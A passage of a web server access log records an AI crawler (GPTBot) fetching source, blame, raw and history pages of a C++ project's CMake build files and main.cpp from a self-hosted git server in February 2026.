[Length 31153] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10664] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" +[17/Feb/2026:15:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10469] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10469] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10468] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10467] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10469] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" +[17/Feb/2026:15:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" +[17/Feb/2026:15:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" +[17/Feb/2026:15:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" +[17/Feb/2026:15:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" +[17/Feb/2026:15:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19494] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" +[17/Feb/2026:15:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10883] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" +[17/Feb/2026:15:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" [Client 74.7.227.38] [Length 10727] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" +[17/Feb/2026:15:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode" [Client 74.7.227.38] [Length 10142] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" +[17/Feb/2026:15:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" +[17/Feb/2026:15:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10400] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm" +[17/Feb/2026:15:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm" +[17/Feb/2026:15:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10396] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm" +[17/Feb/2026:15:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm" +[17/Feb/2026:15:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10396] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm" +[17/Feb/2026:15:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14159] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10163] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" +[17/Feb/2026:15:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11406] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" +[17/Feb/2026:15:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11877] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode" +[17/Feb/2026:15:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14727] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11305] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21338] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" +[17/Feb/2026:15:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode" +[17/Feb/2026:15:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11068] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 